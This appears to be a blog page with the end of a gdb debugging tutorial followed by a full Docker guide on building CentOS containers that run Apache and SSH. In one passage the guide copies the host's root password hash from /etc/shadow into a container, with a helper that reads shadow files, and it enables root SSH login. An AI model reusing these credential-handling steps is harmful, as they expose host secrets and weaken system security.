You will have to make sure that you can create cores. Core sizes are governed by shell resource limits, which you can change on the fly. Depending on your shell, you will use either the limit or ulimit builtins. For BASH:

ulimit -c unlimited

And for TCSH:

limit coredumpsize unlimited

Core format

By default, the core will be dumped in the current directory where the binary was executed. But the core name might not be useful or meaningful. So you can change its format, which is governed by the core_pattern setting under /proc. For example:

echo "/tmp/core-%p-%u" > /proc/sys/kernel/core_pattern

This will dump a core under /tmp, with the PID and UID suffixed. There are many other available options. You can also set this option permanently via sysctl.conf. For more reading, perhaps you want to consult this cyberciti article and this Novell cool solution.

Core dumped

Invoke gdb against core file

Next, your application will crash and create a core. Then, use gdb as follows:

gdb <binary> <core>

Read core

The important thing is that gdb successfully read and loaded the symbols. We can now proceed with the analysis, like before. Some functions will not be available to us, as the core is not a running application, but we will still be able to figure out what went wrong.

Attach to a running process

Similarly, you may want to attach gdb to a running process. As it happens, you may have a problem right now, so you cannot restart the program and try to reproduce the issue at leisure. This may not be the most effective way of debugging problems, but it could give you additional information that may not be available otherwise.

The simplest way to demonstrate this is by altering our example with an extra sleep somewhere. Then, while the program is running, find its PID and attach to it.

gdb -p <process id>

Attach to running process

This example also shows that the third-party libraries are stripped, so you get function names, but you don’t know the exact lines of code or the variables. Moreover, using the backtrace (bt) command, we see we’re currently sleeping.

Other useful commands

Let’s list down a few other commands you may want to try and use.

show lets you show contents, as simple as that. set lets you configure variables. For example, you may want to see the initial arguments your program started with and then change them. In our heap overflow example, we could try altering the value of i to see if that affects the program.

show & set

The syntax for setting variables is quite simple. set i=4 would do. You can also set registers, but don’t do this if you don’t know what you’re doing. list lets you dump your code. You can list individual lines, specific functions or entire code. By default, you get ten lines printed, sort of like tail.


Another thing you may want to do is inspect stack frames in detail. We’re already familiar with the info command, so what we need now is to invoke it against specific frames, as listed by the backtrace (bt) command. In our heap overflow example, there’s only a single frame.

We break in main, run, display the backtrace and then check info frame 0, as shown in the screenshot below. You get a wealth of information, including the instruction pointer (RIP), the saved instruction pointer from a previous frame, the address and the list of arguments, the address and the list of local variables, the previous stack pointer, and saved registers.

info frame

I mentioned backtrace (bt) earlier, and indeed, it is a most valuable command, best used when you don’t know what your program is doing. External commands can be executed using the shell command. For instance, showing /proc/PID/maps can also be done using shell cat /proc/PID/maps instead of info proc mappings as we did before. If for some reason you cannot use either, then you might want to resort to readelf to try to decipher the binary. Like we used next and stepi, you can use nexti and step. Let’s not forget finish, jump, until, and call. whatis lets you examine variables.

And that’s enough for this section, I guess.

When to use or not use gdb?

All right, gdb is useful when you have reproducible problems and your binaries have been compiled with symbols. You can also try using gdb against third-party functions, but this won’t guarantee much success.

For instance, we know we’re using printf() in our code. So maybe we need to break there? Well, gdb will inform us that the function is not defined and will create a breakpoint pending on a future shared library load. Not a bad idea, but do notice that all we get is an address and a bare function name, because we don’t have debug symbols for the library, and for that matter, we might not even have its sources. Without either, it will not be easy figuring out what went wrong.

(gdb) break printf
Function “printf” not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (printf) pending.
(gdb) run
Starting program: /tmp/segfaults/seg
Breakpoint 2 at 0x2aaaaac113f0
Pending breakpoint “printf” resolved

Breakpoint 2, 0x00002aaaaac113f0 in printf () from /lib64/

Finally, using gdb for sporadic, random problems that are not easily reproduced or those that might stem from hardware problems is a hard, grueling task that will yield few results. Even the trivial examples are not so trivial, so imagine what happens on a real production system, with binaries compiled from sources with thousands of lines of code. Still, you get a taste of the goodness, and you’re hooked now.

Lastly, let’s see an example where gdb is both the worst and best tool for analysis. We’ll create an infinite loop program, nothing sinister, just a bit of while true thingie. This kind of program will loop forever, churning CPU.

If you try strace, you see this – useless:


If you try gdb, it works, we can break in main just fine, but after several next commands, even gdb seems to hang. In this case, you will have to interrupt the execution to get back to your code. Now, with symbols, it’s trivial seeing where the problem lies. But let’s assume that we have nothing; we only know where the problem manifests.


All right, enter disassembly once again. The important thing is that our program revolves around two instructions. You have the comparison (cmpl) and the jump (je). We’re in a tight loop. Naughty. But even if you don’t have the sources, even if the program has no symbols and you don’t know what it’s doing, you can still figure out what’s wrong.

forever, disassemble

TL;DR – Read only if you’re bored

Here’s a bit more about what we saw in the disassemble section. It may help you understand a little better how things work.

Let’s examine the top three lines.

0x00000000400534 <+0> push %rbp
0x00000000400535 <+1> mov  %rsp,%rbp
0x00000000400538 <+4> sub  $0x20,%rsp

These three lines are called the Function Prologue, and it’s automatically added by the GCC compiler on the standard x86 (32-bit) and x86_64 (64-bit) architectures. I’m not sure how things behave on other processors.

The Function Prologue has one function [sic] – to preserve the value of the base pointer of the previous frame on the stack, or in other words, the calling function’s stack frame. On the 32-bit architecture, the EBP register is used for this purpose, on the 64-bit architecture, the RBP register.

So the first instruction pushes the old base pointer onto the stack, decrementing the stack pointer. Note: the stack grows downwards, so to speak, but this is part of those boring prerequisites we talked about earlier. Then, the stack pointer value is copied into the base pointer register. The third instruction allocates 0x20 (32) bytes for the function’s local variables. sub $0x20,%rsp can also be read as %rsp = %rsp - 0x20. The actual value will depend on the function’s declaration.

Similarly, at the end of the assembly dump, there’s the Function Epilogue, which does exactly the same as the Prologue, in reverse. The epilogue consists of the leave and ret instructions; in our example, leaveq and retq.

In between, we have all kinds of instructions that depend entirely on how the function is written and what it does. We’ve seen enough earlier, so no need to elaborate more.

To learn more about stack frames, use the backtrace (bt) command and then info frame. In our two examples, the trace is simple, with just one frame each, but some programs may have 10-15 frames, etc. This is especially useful if you don’t know what the binary is supposed to be doing.


Some more reading

You can read more about AT&T Assembly in this quick ‘n’ dirty guide.

You can also read more about the x86 (and x86_64) assembly language on Wikipedia.

And let’s not forget Call stack.


This was ultra-geeky, I admit, but I think you liked it, if you got this far. Working with gdb is not a simple deal, but the tool is extremely versatile and powerful. You will need a lot of time mastering its commands and abilities to the fullest, best done with real problems that truly emphasize what you’re doing. For starters, grab some bad C code and start practicing.

We learned how to work our way through the code, with break points and conditions, next and stepi commands, assembly dumps, info on various important elements, and whatnot. Alongside the vast array of other powerful tools and admin hacks that I’ve taught you before, your Linux pimpage ought to climb majestically. Stay sweet.

A thorough Introduction Guide To Docker Containers

Let me start with a big promise. You will absolutely LOVE this article today. It’s going to be long, detailed and highly useful. Think GRUB, GRUB2. The same thing here. Only we will tackle Docker, a nice distribution platform that wraps the Linux Containers (LXC) technology in a simple, convenient way.

I will show you how to get started, and then we will create our own containers with SSH and Apache, learn how to use Dockerfiles, expose service ports, and solve an immense number of little bugs and problems that normally never get addressed in public forums. Please, without further ado, follow me.


Table of Contents

  1. Introduction
  2. Docker implementation
  3. Getting started
  4. Docker commands
  5. Pull image
  6. Start a Docker container
  7. Install Apache & SSH
    1. Start service
    2. Apache service
    3. SSH service
  8. Check if Web server is up
    1. Expose incoming ports
    2. Check IP address
    3. Testing new configuration
  9. Check if SSH works
    1. Wait, what is the root password?
  10. Commit image
  11. Dockerfile
    1. Build image
    2. Test image
  12. Alternative build
    1. COPY instruction
  13. Advantages of containers
  14. Problems you may encounter & troubleshooting
  15. Additional commands
    1. Differences between exec and attach
    2. Differences between start and run
    3. Differences between build and create
  16. This is just a beginning …
  17. More reading
  18. Conclusion


I have given a brief overview of the technology in a Gizmo’s Freeware article sometime last year. Now, we are going to get serious about using Docker. First, it is important to remember that this framework allows you to use LXC in a convenient manner, without having to worry about all the little details. It is the next step in this world, the same way OpenStack is the next evolutionary step in the virtualization world. Let me give you some history and analogies.

Virtualization began with software that lets you abstract your hardware. Then, to make things speedier, virtualization programs began using hardware acceleration, and then you also got paravirtualization. In the end, hypervisors began popping up like mushrooms after rain, and it became somewhat difficult to provision and manage them all. This is the core reason for concepts like OpenStack, which hide different platforms under a unified API.

The containers began their way in a similar manner. First, we had the chroot, but processes running inside the jailed environment shared the same namespace and fought for the same resources. Then, we got the kexec system call, which let us boot into the context of another kernel without going through the BIOS. Then, control groups came about, allowing us to partition system resources like CPU, memory and others into subgroups, thus allowing better control, hence the name, of processes running on the system.

Later on, the Linux kernel began offering full isolation of resources, using cgroups as the basic partitioning mechanism. Technically, this is a system-level virtualization technology, allowing you to run multiple isolated user-space instances on top of a single running kernel inside self-contained environments, with the added bonus of very little performance penalty and overhead.

Several competing technologies tried to offer similar solutions, like OpenVZ, but the community eventually narrowed down its focus to the native enablement inside the mainline kernel, and this seems to be the future direction. Still, LXC remains somewhat difficult to use, as a fair amount of technical knowledge and scripting is required to get the containers running.

This is where Docker comes into place. It tries to take away the gritty pieces and offer a simple method of spawning new container instances without worrying about the infrastructure backend. Well, almost. But the level of difficulty is much less.

Another strong advantage of Docker is a widespread community acceptance, as well as the emphasis on integration with cloud services. Here we go full buzzword, and this means naming some of the big players like AWS, Hadoop, Azure, Jenkins and others. Then we can also talk about Platform as a Service (Paas), and you can imagine how much money and focus this is going to get in the coming years. The technological landscape is huge and confusing, and it’s definitely going to keep on changing and evolving, with more and more concepts and wrapper technologies coming into life and building on top of Docker.

But we want to focus on the technological side. Once we master the basics, we will slowly expand and begin utilizing the strong integration capabilities, the flexibility of the solution, and work on making our cloud ecosystem expertise varied, automated and just pure rad. That won’t happen right now, but I want to help you navigate the first few miles, or should we say kilometers, of the muddy startup waters, so you can begin using Docker in a sensible, efficient way. Since this is a young technology, it’s the Wild West out there, and most of the online documentation, tips, tutorials and whatnot are outdated, copy & paste versions that do not help anyone, and largely incomplete. I want to fix that today.

Docker implementation

A bit more boring stuff before we do some cool things. Anyhow, Docker is mostly about LXC, but not just. It’s been designed to be extensible, and it can also interface with libvirt and systemd. In a way, this makes it almost like a hyper-hypervisor, as there’s potential for future growth, and when additional modules are added, it could effectively replace classic hypervisors like Xen or KVM or anything using libvirt and friends.

Docker diagram

This be a public domain image, if you wondered.

Getting started

We will demonstrate using CentOS 7. Not Ubuntu. Most of the online stuff focuses on Ubuntu, but I want to show you how it’s done using as-near-as-enterprise flavor of Linux as possible, because if you’re going to be using Docker, it’s gonna be somewhere business like. The first thing is to install docker:

yum install docker-io

Once the software is installed, you can start using it. However, you may encounter the following two issues the first time you attempt to run docker commands:

docker <any one command>
FATA[0000] Get http:///var/run/docker.sock/v1.18/images/json: dial unix /var/run/docker.sock: no such file or directory. Are you trying to connect to a TLS-enabled daemon without TLS?

And the other error is:

docker <any one command>
FATA[0000] Get http:///var/run/docker.sock/v1.18/containers/json: dial unix /var/run/docker.sock: permission denied. Are you trying to connect to a TLS-enabled daemon without TLS?

The reason is, you need to start the Docker service first. Moreover, you must run the technology as root, because Docker needs access to some rather sensitive pieces of the system, and interact with the kernel. That’s how it works.

systemctl start docker

Now we can go crazy and begin using Docker.

Docker commands

The basic thing is to run docker help to get the available list of commands. I will not go through all the options. We will learn more about them as we go along. In general, if you’re ever in doubt, you should consult the pretty decent online documentation. The complete CLI reference also kicks ass. And then, there’s also an excellent cheat sheet on GitHub. But our first mission will be to download a new Docker image and then run our first instance.

Pull image

There are many available images. We want to practice with CentOS. This is a good starting point. An official repository is available, and it lists all the supported images and tags. Indeed, at this point, we need to understand how Docker images are labeled.

The naming convention is repository:tag, for example centos:latest. In other words, we want the latest CentOS image. But the required image might just as well be centos:6.6. All right, let’s do it.

Pulling image

Now let’s list the images by running the docker images command:


Start a Docker container

As we’ve seen in my original tutorial, the simplest example is to run a shell:

docker run -ti centos:centos7 /bin/bash

So what do we have here? We are running a new container instance with its own TTY (-t) and STDIN (-i), from the CentOS 7 image, with a BASH shell. Within a few seconds, you will get a new shell inside the container. Now, it’s a very basic, very stripped-down operating system, but you can start building things inside it.

Run container

Container running top

Install Apache & SSH

Let’s setup a Web server, which will also have SSH access. To this end, we will need to do some rather basic installations. Grab Apache (httpd) and SSHD (openssh-server), and configure them. This has nothing to do with Docker, per se, but it’s a useful exercise.

Now, some of you may clamor: wait, you don’t need SSH inside a container, it’s a security risk and whatnot. Well, maybe, yes and no, depending on what you need and what you intend to use the container for. But let’s leave the security considerations aside. The purpose of the exercise is to learn how to set up and run ANY service.

Start service

You might want to start your Apache using an init script or a systemd command. This will not quite work. CentOS 7 itself comes with systemd, but the container does not run its own systemd instance, so such commands will fail.

systemctl start httpd
Failed to get D-Bus connection: No connection to service manager.

There are hacks around this problem, and we will learn about some of these in a future tutorial. But in general, given the lightweight and simple nature of containers, you do not really need a fully fledged startup service to run your processes, which does away with some complexity.

Apache service

To run Apache (HTTPD), just execute /usr/sbin/httpd – or an equivalent command in your distro. The service should start, most likely with a warning that you have not configured your ServerName directive in httpd.conf. We have learned how to do this in my rather extensive Apache guide.

AH00558: httpd: Could not reliably determine the server’s fully qualified domain name, using Set the ‘ServerName’ directive globally to suppress this message

SSH service

With SSHD, run /usr/sbin/sshd.

/usr/sbin/sshd -f /etc/ssh/sshd_config
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Could not load host key: /etc/ssh/ssh_host_ecdsa_key
Could not load host key: /etc/ssh/ssh_host_ed25519_key

You will also fail, because you won’t have all the keys. Normally, startup scripts take care of this, so you will need to run the ssh-keygen command once before the service starts correctly. Either one of the two commands will work:

/usr/bin/ssh-keygen -t rsa -f <path to file>

/usr/bin/ssh-keygen -A
ssh-keygen: generating new host keys: RSA1 RSA DSA ECDSA ED25519

Check if Web server is up

Now, inside the container, we can see that Apache is indeed running.

ps -ef|grep apache
apache      87    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      88    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      89    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      90    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      91    86  0 10:47 ?        00:00:00 /usr/sbin/httpd

But what if we want to check external connectivity? At this point, we have a couple of problems on our hands. One, we have not set up any open ports, so to speak. Two, we do not know what the IP address of our container is. Now, if you try to run ifconfig inside the BASH shell, you won’t get anywhere, because the necessary package containing the basic networking commands is not installed. Good, because it makes our container slim and secure.

Expose incoming ports

Like with any Web server, we will need to allow incoming connections. We will use the default port 80. This is no different than port forwarding in your router, allowing firewall policies and whatnot. With Docker, there are several ways you can achieve the desired result.

When starting a new container with the run command, you can use the -p option to specify which ports to open. You can choose a single port or a range of ports, and you can also map both the host port (hostPort) and container port (containerPort). For instance:

  • -p 80 will expose container port 80. It will be automatically mapped to a random port on the host. We will learn later on how to identify the correct port.
  • -p 80:80 will map the container port to host port 80. This means you do not need to know the internal IP address of the container. There is an element of internal NAT involved, which goes through the Docker virtual interface; we will discuss this soon. Moreover, with this method, only a single container will be able to bind to port 80. If you want to run multiple Web servers with different IP addresses, you will have to set each of them up on a different host port.

docker run -ti -p 22:22 -p 80:80 image-1:latest
FATA[0000] Error response from daemon: Cannot start container 64bd520e2d95a699156f5d40331d1aba972039c3c201a97268d61c6ed17e1619: Bind for failed: port is already allocated

There are many additional considerations. IP forwarding, bridged networks, public and private networks, subnet ranges, firewall rules, load balancing, and more. At the moment, we do not need to worry about these.

There is also an additional method of how we can expose port, but we will discuss that later on, when we touch on the topic of Dockerfiles, which are templates for building new images. For now, we need to remember to run our images with the -p option.

Check IP address

If you want to leave your host ports free, you can omit the hostPort piece. In that case, you can connect to the container directly, using its IP address and the Web server port. To do that, we need to figure out the container details:

docker inspect <container name or ID>

This will give a very long list of details, much like the KVM XML config, except this one is written in JSON – another modern format for data: readable, but rather ugly.

docker inspect distracted_euclid
“AppArmorProfile”: “”,
“Args”: [],
“Config”: {
“AttachStderr”: true,
“AttachStdin”: true,
“AttachStdout”: true,
“Cmd”: [
“CpuShares”: 0,
“Cpuset”: “”,
“Domainname”: “”,
“Entrypoint”: null,
“Env”: [

“ExposedPorts”: {
“80/tcp”: {}
“Hostname”: “43b179c5aec7”,
“Image”: “centos:centos7”,
“Labels”: {},
“MacAddress”: “”,

We can narrow it down to just the IP address.

docker inspect <container name or ID> | grep -i “ipaddr”
“IPAddress”: “”,
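If you want something reusable, the extraction can be wrapped in a tiny helper. This is a sketch that parses saved docker inspect output from a file (e.g. docker inspect <container> > inspect.json), matching the "IPAddress" field shown above; the function name is ours, purely for illustration.

```shell
# Pull the first IPAddress value out of docker-inspect-style JSON.
extract_ip() {
  grep -io '"ipaddress": *"[0-9.]*"' "$1" | head -n1 | grep -o '[0-9.]*[0-9]'
}
```

Usage: extract_ip inspect.json prints just the dotted-quad address, with none of the surrounding JSON.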

Testing new configuration

Let’s start fresh. Launch a new instance, setup Apache, start it. Open a Web browser and test. If it works, then you have properly configured your Web server. Exactly what we wanted.

docker run -it -p 80:80 centos:centos7 /bin/bash

If we check the running container, we can see the port mapping – the output is split over multiple lines for brevity, so please excuse that. Normally, the all-uppercase titles show as the row header, with the rest printed below, one container per line.

# docker ps
CONTAINER ID        IMAGE               COMMAND
43b179c5aec7        centos:centos7      “/bin/bash”

CREATED             STATUS              PORTS
2 hours ago         Up 2 hours>80/tcp

NAMES               distracted_euclid

And in the browser, we get:

Web server running

Optional: Now, the internal IP address range will only be accessible on the host. If you want to make it accessible from other machines, you will need NAT and IP forwarding. And if you want to use names, you will need to properly configure /etc/hosts as well as DNS. For containers, this can be done using the --add-host=”host:IP” directive when running a new instance.

Another note: Remember that Docker has its own internal networking, much like VirtualBox and KVM, as we’ve seen in my other tutorials. It’s a fairly extensive /16 network, so you have quite a lot of freedom. On the host:

# /sbin/ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet  netmask  broadcast
inet6 fe80::5484:7aff:fefe:9799  prefixlen 64  scopeid 0x20<link>
ether 56:84:7a:fe:97:99  txqueuelen 0  (Ethernet)
RX packets 6199  bytes 333408 (325.5 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 11037  bytes 32736299 (31.2 MiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Check if SSH works

We need to do the same exercise with SSH. Again, this means exposing port 22, and we have several options available. To make it more interesting, let’s try with a random port assignment:

docker run -ti -p 22 -p 80 centos:centos7 /bin/bash

And if we check with docker ps, specifically for ports:

>22/tcp,>80/tcp   boring_mcclintock

This means you can connect to the docker0 IP address, on the ports shown in the docker ps output above, and this is equivalent to connecting to the container IP directly, on its service port. This can be useful, because you do not need to worry about the internal IP address your container uses, and it can simplify forwarding. Now, let’s try to connect. We can use the host port, or we can use the container IP directly.

ssh -p 49117

Either way, we will get what we need, for instance:

The authenticity of host ‘ (’ can’t be established. ECDSA key fingerprint is 00:4b:de:91:60:e5:22:cc:f7:89:01:19:3e:61:cb:ea.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘’ (ECDSA) to the list of known hosts.
root@’s password:

Wait, what is the root password?

We will fail, because we do not have the root password. So what do we do now? Again, we have several options. First, try to change the root password inside the container using the passwd command. But this won’t work, because the passwd utility is not installed. We could grab the necessary RPM and set it up inside the container. On the host, check which package provides the file:

rpm -q --whatprovides /etc/passwd

But installing extra packages widens the attack surface, and we want our containers to be lean. So we can just copy the password hash for root from /etc/shadow on the host into the container. Later, we will learn a more streamlined way of doing it.
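As a sketch of the copy-the-hash approach, the snippet below pulls the root entry out of a shadow-format file; on the host this would be /etc/shadow (readable by root only), and the line would then be pasted over the root entry in the container’s /etc/shadow. The function name is ours, purely for illustration.

```shell
# Print the root user's entry from a shadow-format file.
root_shadow_entry() {
  grep '^root:' "$1"
}
```

The second field of that colon-separated line is the password hash that the container’s sshd will check against.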

Another thing that strikes quite clearly is that we are repeating all our actions. This is not efficient, and this is why we want to preserve changes we have done to our container. The next section handles that.

SSH success

Commit image

After you’ve made changes to the container, you may want to commit it. In other words, when starting a new container later on, you will not need to repeat all the steps from scratch, you will be able to reuse your existing work and save time and bandwidth. You can commit an image based on its ID or its alias:

docker commit <container name or ID> <new image>

For example, we get the following:

docker commit 43b179c5aec7 myapache3


Check the list of images again:

Image committed


Dockerfile

A more streamlined way of creating your images is to use Dockerfiles. In a way, it’s like using a Makefile for compilation, only in Docker format. Or an RPM specfile, if you will. Basically, in any one “build” directory, create a Dockerfile. We will learn what things we can put inside one, and why we want it for our Apache + SSH exercise. Then, we will build a new image from it. We can combine it with our committed images to preserve changes already done inside the container, like the installation of software, to make it faster and save network utilization.

Before we go any further, let’s take a look at a Dockerfile that we will be using for our exercise. At the moment, the commands may not make much sense, but they soon will.

FROM myhttptest2:latest

EXPOSE 22
CMD ["/usr/sbin/sshd", "-D"]

EXPOSE 80
RUN mkdir -p /run/httpd
CMD ["/usr/sbin/httpd", "-D", "FOREGROUND"]

What do we have here?

  • The FROM directive tells us what repo:tag to use as the baseline. In our case, it’s one of the committed images, which already contains the httpd and sshd binaries, SSH keys, and a bit more.
  • EXPOSE 22 – This line exposes port 22 inside the container. We can map it further using the -p option at runtime. The same is true for EXPOSE 80, which is relevant for the Web server.
  • CMD [“/usr/sbin/sshd”, “-D”] – This instruction runs an executable, with optional arguments. It is as simple as that.
  • RUN mkdir -p /run/httpd – This instruction runs a command in a new layer on top of the base image – and COMMITS the results. This is very important to remember, as we will soon discuss what happens if you don’t use the RUN mkdir thingie with Apache.
  • CMD [“/usr/sbin/httpd”, “-D”, “FOREGROUND”] – We run the server, in the foreground. The last bit is optional, but for the time being, you can start Apache this way. Good enough.

As you can see, Dockerfiles aren’t that complex or difficult to write, but they are highly useful. You can pretty much add anything you want. These templates form a basis for automation, and with conditional logic, you can create all sorts of scenarios and spawn containers that match your requirements.

Build image

Once you have a Dockerfile in place, it’s time to build a new image. Dockerfiles must follow a strict convention, just like Makefiles. It’s best to keep different image builds in separate sub-directories. For example:

docker build -t test5 .
Sending build context to Docker daemon 41.47 kB
Sending build context to Docker daemon
Step 0 : FROM myapache4:latest
—> 7505c70235e6
Step 1 : EXPOSE 22 80
—> Using cache
—> 58f11217c3e3
Step 2 : CMD /usr/sbin/sshd -D
—> Using cache
—> 628c3d6b5399
Step 3 : RUN mkdir -p /run/httpd
—> Using cache
—> 5fc118f61a4d
Step 4 : CMD /usr/sbin/httpd -D FOREGROUND
—> Using cache
—> d892acd86198
Successfully built d892acd86198

The command reads as follows: build a new image tagged (-t) test5, from the Dockerfile stored in the current directory (.). That’s all. Very simple and elegant.

Test image

Run a new container from the created image. If everything went smoothly, you should have both SSH connectivity, as well as a running Web server in place. Again, all the usual network related rules apply.

Running successfully, built from Dockerfile

Alternative build

Once you know how to do it on your own, you can try one of the official Apache builds. Indeed, the Docker repository contains a lot of good stuff, so you should definitely invest time checking the available templates. For Apache, you only need the following in your Dockerfile – the second line is optional.

FROM httpd:2.4
COPY ./public-html/ /usr/local/apache2/htdocs/

COPY instruction

What do we have above? Basically, in the Dockerfile, we declare what template to use. Then, we have a COPY instruction, which will look for a public-html directory in the current folder and copy it into the container during the build. In the same manner, you can also copy your httpd.conf file. Depending on your distribution, the paths and filenames might differ. Finally, after building the image and running the container:

docker run -ti -p 22 -p 80 image-1:latest
AH00558: httpd: Could not reliably determine the server’s fully qualified domain name, using Set the ‘ServerName’ directive globally to suppress this message
[Thu Apr 16 21:08:35.967670 2015] [mpm_event:notice] [pid 1:tid 140302870259584] AH00489: Apache/2.4.12 (Unix) configured — resuming normal operations
[Thu Apr 16 21:08:35.976879 2015] [core:notice] [pid 1:tid 140302870259584] AH00094: Command line: ‘httpd -D FOREGROUND’

Default HTTPD works

Advantages of containers

There are many good reasons why you want to use this technology. But let’s just briefly focus on what we gain by running these tiny, isolated instances. Sure, there’s a lot happening under the hood, in the kernel, but in general, the memory footprint of spawned containers is fairly small. In our case, the SSH + Apache containers use a tiny fraction of extra memory. Compare this to any virtualization technology.

Container memory

Low memory usage

Problems you may encounter & troubleshooting

Let’s go back to the Apache example. Now you will also learn why so many online tutorials sin the sin of copy & pasting information without checking, and why, unfortunately, most of the advice out there is not correct. It all comes down to one question: what do you do if your Apache server seems to die within a second or two of launching the container? If this happens, you want to step into the container and troubleshoot. To that end, you can use the docker exec command to attach a shell to the instance.

docker exec -ti boring_mcclintock /bin/bash

Then, it comes down to reading logs and trying to figure out what might have gone wrong. If your httpd.conf is configured correctly, you will have access and error logs under /var/log/httpd:

[auth_digest:error] [pid 25] (2)No such file or directory: AH01762: Failed to create shared memory segment on file /run/httpd/authdigest_shm.25

A typical problem is that you may be missing the /run/httpd directory. If it does not exist in your container, httpd will start and immediately die. Sounds simple, but few if any references mention this.

While initially playing with containers, I did encounter this issue. Reading online, I found several suggestions, none of which really helped. But I do want to elaborate on them, and show how you can make progress in your problem solving, even if the intermediate steps aren’t really useful.

Suggestion 1: You must use -D FOREGROUND to run Apache, and you must also use ENTRYPOINT rather than CMD. The difference between the two instructions is very subtle. And it does not solve our problem in any way.

ENTRYPOINT [“/usr/sbin/httpd”]

Suggestion 2: Use a separate startup script, which could work around any issues with the starting or restarting of the httpd service. In other words, the Dockerfile becomes something like this:

COPY ./ /
RUN chmod -v +x /
CMD [“/”]

And the contents of the script are along the lines of:


#!/bin/bash

rm -rf /run/httpd/*

exec /usr/sbin/apachectl -D FOREGROUND

Almost there. Removing any old leftover PID files is a good idea, but these are normally not stored under /run/httpd; you will find them under /var/run/httpd instead. Moreover, we are not certain that this directory exists at all.

Finally, the idea is to work around any problems with the execution of a separate shell inside which the httpd process is spawned. While this does provide additional, useful lessons on how to manage the container with COPY and RUN instructions, it’s not what we need to fix the issue.

Step 3 : EXPOSE 80
—> Using cache
—> 108785c8e507
Step 4 : COPY ./ /
—> 582d795d59d4
Removing intermediate container 7ff5b58b40bf
Step 5 : RUN chmod -v +x /
—> Running in 56fadf4dd2d4
mode of ‘/’ changed from 0644 (rw-r--r--) to 0755 (rwxr-xr-x)
—> 928640f680cf
Removing intermediate container 56fadf4dd2d4
Step 6 : CMD /
—> Running in f9c6b30795e2
—> b2dcc2818a27
Removing intermediate container f9c6b30795e2
Successfully built b2dcc2818a27

This won’t work, because apachectl is an unsupported command for managing httpd, plus we have seen problems using startup scripts and utilities earlier, and we will work on fixing this in a separate tutorial.

docker run -ti -p 80 image-2:latest
Passing arguments to httpd using apachectl is no longer supported. You can only start/stop/restart httpd using this script. If you want to pass extra arguments to httpd, edit the /etc/sysconfig/httpd config file.

But it is useful to try these different things, to get the hang of it. Unfortunately, it also highlights the lack of maturity and the somewhat inadequate documentation for this technology out there.
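That said, the directory-preparation part of the startup-script idea is worth keeping, because it addresses the actual missing-directory problem. Below is a minimal sketch, assuming /run/httpd and /var/run/httpd are the paths in play; the exec line is shown commented out so the preparation step stands on its own.

```shell
# Make sure the directories httpd expects exist, then clear any stale
# PID or shared-memory files left over from a previous run.
prepare_httpd_dirs() {
  local d
  for d in "$@"; do
    mkdir -p "$d"
    rm -rf "$d"/*
  done
}

# In a real start script you would then hand control to httpd:
# prepare_httpd_dirs /run/httpd /var/run/httpd
# exec /usr/sbin/httpd -D FOREGROUND
```

Running httpd directly (rather than through apachectl) avoids the unsupported-arguments error shown below.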

Additional commands

There are many ways you can interact with your container. If you do not want to attach a new shell to a running instance, you can use a subset of docker commands directly against the container ID or name:

docker <command> <container name or ID>

For instance, to get the top output from the container:

docker top boring_stallman

If you have too many images, some of which have just been used for testing, then you can remove them to free up some of your disk space. This can be done using the docker rmi command.

# docker rmi -f test7
Untagged: test7:latest
Deleted: d0505b88466a97b73d083434b2dd0e7b59b9a5e8d0438b1bf8c6c
Deleted: 5fc118f61bf856f6f3d90e0e71076b737fa7cc58cd56785ea7904
Deleted: 628c3d6b53992521c9c1fdda4148693347c3d10b1d130f7e091e7
Deleted: 58f11217c3e31206b4e41d07100a797cd4d17e4569b0fdb8b7a18
Deleted: 7505c70235e638c54028ea5b63eba2b691de6bee67c2cb5e2861a

Then, you can also run your containers in the background. Using the -d flag will do exactly that, and you will get the shell prompt back. This is also useful because, unless signals are masked, accidentally sending a break in your shell might kill the container when it is running in the foreground.

docker run -d -ti -p 80 image-3:latest

You can also check events, examine changes inside a container’s filesystem, and check history – so you basically have version control in place – as well as export or import tarred images to and from remote locations, including over the Web, and more.

Differences between exec and attach

If you read through the documentation, you will notice you can connect to a running container using either the exec or the attach command. So what’s the difference, you may ask? The official documentation says:

The docker exec command runs a new command in a running container. The command started using docker exec only runs while the container’s primary process (PID 1) is running, and it is not restarted if the container is restarted.

On the other hand, attach gives you the following:

The docker attach command allows you to attach to a running container using the container’s ID or name, either to view its ongoing output or to control it interactively. You can attach to the same contained process multiple times simultaneously, screen sharing style, or quickly view the progress of your daemonized process. You can detach from the container (and leave it running) with CTRL-p CTRL-q (for a quiet exit) or CTRL-c which will send a SIGKILL to the container. When you are attached to a container, and exit its main process, the process’s exit code will be returned to the client.

In other words, with attach, you will get a shell, and be able to do whatever you need. With exec, you can issue commands that do not require any interaction, but if you use a shell in combination with exec, you will achieve the same result as with attach.

Differences between start and run

Start is used to resume the execution of a stopped container. It is not used to start a fresh instance. For that, you have the run command. The choice of words could have been better.

Differences between build and create

The first command is used to create a new image from a Dockerfile. On the other hand, the latter is used to create a new container using command line options and arguments. Create lets you specify container settings, too, like network configurations, resource limitations and other settings, which affect the container from the outside, whereas the changes implemented by the build command will be reflected inside it, once you start an instance. And by start, I mean run. Get it?

This is just a beginning …

There are a million more things we can do: using systemd enabled containers, policies, security, resource constraints, proxying, signals, other networking and storage options including the super-critical question of how to mount data volumes inside containers so that data does not get destroyed when containers die, additional pure LXC commands, and more. We’ve barely scratched the surface. But now, we know what to do. And we’ll get there. Slowly but surely.

More reading

I recommend you allocate a few hours and then spend some honest time reading all of the below, in detail. Then practice. This is the only way you will really fully understand and embrace the concepts.

Dockerizing an SSH Daemon Service

Differences between save and export in Docker

Docker Explained: Using Dockerfiles to Automate Building of Images


We’re done with this tutorial for today. Hopefully, you’ve found it useful. In a nutshell, it does explain quite a few things, including how to get started with Docker, how to pull new images, run basic containers, add services like SSH and Apache, commit changes to a file, expose incoming ports, build new images with Dockerfiles, lots of troubleshooting of problems, additional commands, and more. Eventful and colorful, I’d dare say.

